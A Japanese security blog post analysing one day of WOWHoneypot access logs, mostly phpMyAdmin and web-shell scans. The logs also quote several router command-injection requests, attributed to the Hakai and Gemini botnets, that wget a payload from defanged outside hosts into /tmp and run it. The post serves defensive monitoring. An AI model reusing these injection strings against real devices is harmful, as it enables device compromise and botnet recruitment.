S-Owl

S(ecurity)Owl

トップ > honeypot > WOWHoneypotの簡易分析(55日目)

WOWHoneypotの簡易分析(55日目)

honeypot

WOWhoneypotの2018/07/28(土) (運用55日目)の簡易分析です。
本日の総アクセス件数は 495件です。本日は大量です。以下が全アクセスログです。

32 2018-07-28 GET /
6 2018-07-28 POST /qq.php
6 2018-07-28 POST /qaq.php
6 2018-07-28 GET /www/phpMyAdmin/index.php
6 2018-07-28 GET /web/phpMyAdmin/index.php
6 2018-07-28 GET /tools/phpMyAdmin/index.php
6 2018-07-28 GET /phpMyAdmin/phpMyAdmin/index.php
6 2018-07-28 GET /phpMyAdmin/index.php
6 2018-07-28 GET /claroline/phpMyAdmin/index.php
6 2018-07-28 GET /admin/phpMyAdmin/index.php
5 2018-07-28 POST /xx.php
4 2018-07-28 POST /q.php
4 2018-07-28 GET /xampp/phpmyadmin/index.php
4 2018-07-28 GET /typo3/phpmyadmin/index.php
4 2018-07-28 GET /pmd/index.php
4 2018-07-28 GET /pma-old/index.php
4 2018-07-28 GET /pmamy/index.php
4 2018-07-28 GET /pmamy2/index.php
4 2018-07-28 GET /PMA/index.php
4 2018-07-28 GET /pma/index.php
4 2018-07-28 GET /PMA2/index.php
4 2018-07-28 GET /phpmyadmin/phpmyadmin/index.php
4 2018-07-28 GET /phpMyAdminold/index.php
4 2018-07-28 GET /phpMyAdmin.old/index.php
4 2018-07-28 GET /phpmyadmin-old/index.php
4 2018-07-28 GET /phpmyadmin/index.php
4 2018-07-28 GET /phpMyadmin_bak/index.php
4 2018-07-28 GET /phpmyadmin2/index.php
4 2018-07-28 GET /phpmyadmin1/index.php
4 2018-07-28 GET /phpmyadmin0/index.php
4 2018-07-28 GET /phpma/index.php
4 2018-07-28 GET /phpadmin/index.php
4 2018-07-28 GET /mysql/index.php
4 2018-07-28 GET /mysqladmin/index.php
4 2018-07-28 GET /mysql-admin/index.php
4 2018-07-28 GET /myadmin/index.php
4 2018-07-28 GET /myadmin2/index.php
4 2018-07-28 GET /index.php
4 2018-07-28 GET /db/index.php
4 2018-07-28 GET /dbadmin/index.php
4 2018-07-28 GET /admin/PMA/index.php
4 2018-07-28 GET /admin/pma/index.php
4 2018-07-28 GET /admin/phpmyadmin/index.php
4 2018-07-28 GET /admin/phpmyadmin2/index.php
4 2018-07-28 GET /admin/mysql/index.php
4 2018-07-28 GET /admin/mysql2/index.php
4 2018-07-28 GET /admin/index.php
3 2018-07-28 PROPFIND /
3 2018-07-28 POST /xw.php
3 2018-07-28 POST /wuwu11.php
3 2018-07-28 POST /w.php
3 2018-07-28 POST /wc.php
3 2018-07-28 POST /s.php
3 2018-07-28 POST /sheep.php
3 2018-07-28 POST /db_session.init.php
3 2018-07-28 POST /db.init.php
3 2018-07-28 GET /webdav/
2 2018-07-28 POST /zuoshou.php
2 2018-07-28 POST /yumo.php
2 2018-07-28 POST /yao.php
2 2018-07-28 POST /xw1.php
2 2018-07-28 POST /xshell.php
2 2018-07-28 POST /xiao.php
2 2018-07-28 POST /xiaoma.php
2 2018-07-28 POST /wshell.php
2 2018-07-28 POST /weixiao.php
2 2018-07-28 POST /webslee.php
2 2018-07-28 POST /wanan.php
2 2018-07-28 POST /system.php
2 2018-07-28 POST /ssaa.php
2 2018-07-28 POST /phpstudy.php
2 2018-07-28 POST /pe.php
2 2018-07-28 POST /mz.php
2 2018-07-28 POST /mx.php
2 2018-07-28 POST /min.php
2 2018-07-28 POST /log.php
2 2018-07-28 POST /lindex.php
2 2018-07-28 POST /l8.php
2 2018-07-28 POST /l7.php
2 2018-07-28 POST /ip.php
2 2018-07-28 POST /infoo.php
2 2018-07-28 POST /hm.php
2 2018-07-28 POST /hh.php
2 2018-07-28 POST /feixiang.php
2 2018-07-28 POST /fack.php
2 2018-07-28 POST /defect.php
2 2018-07-28 POST /db__.init.php
2 2018-07-28 POST /data.php
2 2018-07-28 POST /conflg.php
2 2018-07-28 POST /cmd.php
2 2018-07-28 POST /cainiao.php
2 2018-07-28 POST /aw.php
2 2018-07-28 POST /aotu.php
2 2018-07-28 POST /angge.php
2 2018-07-28 POST /ak.php
2 2018-07-28 POST /ak47.php
2 2018-07-28 POST /9678.php
2 2018-07-28 POST /56.php
2 2018-07-28 POST /12.php
2 2018-07-28 GET /z.php
2 2018-07-28 GET /x.php
2 2018-07-28 GET /wpo.php
2 2018-07-28 GET /wp-config.php
2 2018-07-28 GET /uploader.php
2 2018-07-28 GET /text.php
2 2018-07-28 GET /test.php
2 2018-07-28 GET /_query.php
2 2018-07-28 GET //pma/scripts/setup.php
2 2018-07-28 GET //phpmyadmin/scripts/setup.php
2 2018-07-28 GET //phpMyAdmin-2/scripts/setup.php
2 2018-07-28 GET //myadmin/scripts/setup.php
2 2018-07-28 GET /muhstiks.php
2 2018-07-28 GET /muhstik.php
2 2018-07-28 GET /muhstik-dpr.php
2 2018-07-28 GET /muhstik2.php
2 2018-07-28 GET /lol.php
2 2018-07-28 GET /lala.php
2 2018-07-28 GET /lala-dpr.php
2 2018-07-28 GET /java.php
2 2018-07-28 GET /help.php
2 2018-07-28 GET /desktop.ini.php
2 2018-07-28 GET /db_pma.php
2 2018-07-28 GET /db_cts.php
2 2018-07-28 GET /cmx.php
2 2018-07-28 GET /cmv.php
2 2018-07-28 GET /cmd.php
2 2018-07-28 GET /cmdd.php
1 2018-07-28 HEAD /
1 2018-07-28 GET //xampp/phpmyadmin/scripts/setup.php
1 2018-07-28 GET //websql/scripts/setup.php
1 2018-07-28 GET //web/scripts/setup.php
1 2018-07-28 GET //web/phpMyAdmin/scripts/setup.php
1 2018-07-28 GET //typo3/phpmyadmin/scripts/setup.php
1 2018-07-28 GET //scripts/setup.php
1 2018-07-28 GET /pma/scripts/setup.php
1 2018-07-28 GET //php/phpmyadmin/scripts/setup.php
1 2018-07-28 GET /phpMyAdmin/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin/scripts/setup.php
1 2018-07-28 GET /phpmyadmin/scripts/setup.php
1 2018-07-28 GET //php-my-admin/scripts/setup.php
1 2018-07-28 GET //_phpmyadmin/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin3/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.4.3.1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.1.2.0/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.1.2.0-english/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.1.2.0-all-languages/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.1.1.0-all-languages/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.1.0.0/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.1.0.0-english/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.0.1.1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.0.1.0/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.0.1.0-english/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.0.0-rc1-english/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin2/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.9.2/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.9.1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.9.0/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.9.0-rc1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.9.0.2/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.9.0.1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.8.9/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.8.8/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.8.7/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.8.6/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.8.5/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.8.4/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.8.3/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.8.2/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.8.2.3/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.7.7/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.7.6/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.7.5/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.7.0-rc1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.7.0-pl2/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.7.0-pl1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.7.0-beta1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.6.9/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.6.6/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.6.5/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.6.4-rc1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.6.4-pl4/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.6.4-pl3/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.6.1-pl3/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.6.1-pl2/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.11.1-all-languages/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.11.1.2/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.11.1.1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.11.1.0/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.11.0.0/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.10.2.0/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.10.1.0/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.10.0/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.10.0.2/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.10.0.1/scripts/setup.php
1 2018-07-28 GET //phpMyAdmin-2.10.0.0/scripts/setup.php
1 2018-07-28 GET //phpadmin/scripts/setup.php
1 2018-07-28 GET //mysql/scripts/setup.php
1 2018-07-28 GET //mysqladmin/scripts/setup.php
1 2018-07-28 GET /MyAdmin/scripts/setup.php
1 2018-07-28 GET //MyAdmin/scripts/setup.php
1 2018-07-28 GET /myadmin/scripts/setup.php
1 2018-07-28 GET /muieblackcat
1 2018-07-28 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://hakaiboatnet[.]pw/dlink%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-28 GET //forum/phpmyadmin/scripts/setup.php
1 2018-07-28 GET //db/scripts/setup.php
1 2018-07-28 GET //dbadmin/scripts/setup.php
1 2018-07-28 GET //cpphpmyadmin/scripts/setup.php
1 2018-07-28 GET //cpanelphpmyadmin/scripts/setup.php
1 2018-07-28 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20
1 2018-07-28 GET //blog/phpmyadmin/scripts/setup.php
1 2018-07-28 GET //apache-default/phpmyadmin/scripts/setup.php
1 2018-07-28 GET //admin/scripts/setup.php
1 2018-07-28 GET //admin/pma/scripts/setup.php
1 2018-07-28 GET //admin/phpmyadmin/scripts/setup.php
1 2018-07-28 GET //administrator/components/com_joommyadmin/phpmyadmin/scripts/setup.php

phpMyAdmin関連(272件)とphpに対するPOST(129件)/を除外したアクセス数です。

3 2018-07-28 GET /webdav/
2 2018-07-28 GET /z.php
2 2018-07-28 GET /x.php
2 2018-07-28 GET /wpo.php
2 2018-07-28 GET /wp-config.php
2 2018-07-28 GET /uploader.php
2 2018-07-28 GET /text.php
2 2018-07-28 GET /test.php
2 2018-07-28 GET /_query.php
2 2018-07-28 GET /muhstiks.php
2 2018-07-28 GET /muhstik.php
2 2018-07-28 GET /muhstik-dpr.php
2 2018-07-28 GET /muhstik2.php
2 2018-07-28 GET /lol.php
2 2018-07-28 GET /lala.php
2 2018-07-28 GET /lala-dpr.php
2 2018-07-28 GET /java.php
2 2018-07-28 GET /help.php
2 2018-07-28 GET /desktop.ini.php
2 2018-07-28 GET /db_cts.php
2 2018-07-28 GET /cmx.php
2 2018-07-28 GET /cmv.php
2 2018-07-28 GET /cmd.php
2 2018-07-28 GET /cmdd.php
1 2018-07-28 GET /muieblackcat
1 2018-07-28 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 2018-07-28 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://hakaiboatnet[.]pw/dlink%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-28 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

本日来たphpに対するPOST通信元は3IPありましたが、phpMyAdminのスキャンも合わせて実施していました。

また、その他のphpMyAdminは以下の2種類のbot/ツールによるものでした。

GET /muieblackcat → muieblackcatと呼ばれるbot
GET /w00tw00t.at.blackhats.romanian.anti-sec:) → ZmEuというスキャンツール

他にGETリクエストで様々なphpページを探しているものがきていますが、これはphpMyAdminへのスキャンやphpに対するPOSTを行っていたIPと同一のIPが実施していました。
phpに対するPOSTと同じく、WebShellが設置されているかどうかを調査するスキャン行為かと思われます。

他にはHakaiとGeminiが1件ずつ来ていました。当初は急激に出ていましたが、1週間程度で落ち着いてきています。

1 2018-07-28 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://hakaiboatnet[.]pw/dlink%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$
1 2018-07-28 GET /cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%20%3B%20cd%20/tmp%3Bwget%20hxxp://178.128.11[.]199/rvs%20-O%20/tmp/rz%3Bchmod%20777%20/tmp/rz%3Bsh%20/tmp/rz%20

 

本日のハンティングログは以下です。HakaiとGeminiです。

1 2018-07-28 wget hxxp://hakaiboatnet[.]pw/dlink
1 2018-07-28 wget hxxp://178.128.11[].199/rvs 

 

以上です。